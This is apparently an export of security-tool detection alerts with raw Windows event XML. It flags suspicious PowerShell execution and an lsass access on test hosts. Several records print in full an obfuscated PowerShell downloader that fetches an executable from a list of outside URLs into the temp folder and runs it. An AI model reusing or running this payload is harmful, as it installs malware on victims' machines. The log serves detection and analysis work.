<Data>$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&a
pos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;), DetailSequence=1
DetailTotal=1
SequenceNumber=33
UserId=DESKTOP-RIPCLIP\Clippy
HostName=ConsoleHost
HostVersion=5.1.19041.1
HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=5.1.19041.1
RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
PipelineId=6
ScriptName=
CommandLine=$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&ap
os;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(Invoke-Item): &quot;Invoke-Item&quot;
ParameterBinding(Invoke-Item): name=&quot;Path&quot;; value=&quot;C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe&quot;
</Data>
<Binary></Binary>
</EventData>
</Event>",DESKTOP-RIPCLIP,Windows PowerShell
Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.083919,2020-08-26T09:09:29.083919+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,New-Item,\Windows\System32) in event with Command Line ($Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) 
neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos
;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(New-Item): &quot;New-Item&quot;) and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""PowerShell"">
</Provider>
<EventID Qualifiers=""0"">800</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>8</Task>
<Opcode>0</Opcode>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-26T05:09:29.083919Z"">
</TimeCreated>
<EventRecordID>786</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""0"" ThreadID=""0"">
</Execution>
<Channel>Windows PowerShell</Channel>
<Computer>DESKTOP-RIPCLIP</Computer>
<Security>
</Security>
</System>
<EventData>
<Data>$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&a
pos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;), DetailSequence=1
DetailTotal=1
SequenceNumber=21
UserId=DESKTOP-RIPCLIP\Clippy
HostName=ConsoleHost
HostVersion=5.1.19041.1
HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=5.1.19041.1
RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
PipelineId=6
ScriptName=
CommandLine=$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&ap
os;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(New-Item): &quot;New-Item&quot;
ParameterBinding(New-Item): name=&quot;ItemType&quot;; value=&quot;DIrectOry&quot;
ParameterBinding(New-Item): name=&quot;Path&quot;; value=&quot;C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\&quot;
</Data>
<Binary></Binary>
</EventData>
</Event>",DESKTOP-RIPCLIP,Windows PowerShell
non-system accounts getting a handle to and accessing lsass,1583705494.340693,2020-03-09T02:11:34.340693+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4663,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4663</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>12802</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-08T22:11:34.340584Z"">
</TimeCreated>
<EventRecordID>314462</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4"" ThreadID=""160"">
</Execution>
<Channel>Security</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security>
</Security>
</System>
<EventData>
